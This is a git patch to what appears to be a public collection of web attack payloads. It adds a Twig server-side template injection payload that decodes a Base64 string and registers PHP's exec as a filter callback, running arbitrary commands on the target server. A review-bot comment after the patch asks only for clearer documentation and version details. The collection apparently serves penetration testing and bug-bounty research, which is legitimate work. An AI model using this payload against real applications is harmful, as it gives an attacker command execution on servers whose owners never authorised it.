From 289573def1cb30b9370db1e22772af0231d01d3e Mon Sep 17 00:00:00 2001 From: BootstrapBool Date: Wed, 15 Apr 2026 19:30:00 -0400 Subject: [PATCH] Adds base64 encoded twig payload --- Server Side Template Injection/PHP.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 7b9c0a92..9f4f2b73 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -201,6 +201,12 @@ The following payload, which harnesses the built-in `_context` variable, also ac Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation). +The following allows passing of a Base64 encoded payload. + +```twig +{%set a%}UTF-8{%endset%}{%set b%}BASE64{%endset%}{%set p%}base64 encoded string{%endset%}{%set p = p|convert_encoding((a), (b))%}{%set e%}exec{%endset%}{{_self.env.registerUndefinedFilterCallback(e|lower)}}{{_self.env.getFilter(p)}} +``` + --- ## Latte
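Review bot: The added sentence "The following allows passing of a Base64 encoded payload." documents neither what the entry does nor what it depends on, whereas the entry directly above it links a reference and explanation. Please say that the `p` block holds the Base64 text that is run through `convert_encoding((a), (b))` with `UTF-8` and `BASE64` before it reaches `getFilter`. Mark `base64 encoded string` as a placeholder (for example in angle brackets) so it is not read as literal content. State which Twig versions and configurations expose `_self.env`, since nothing in the hunk tells a reader where this applies or how to confirm a patched target is unaffected. "Base64-encoded" should also be hyphenated.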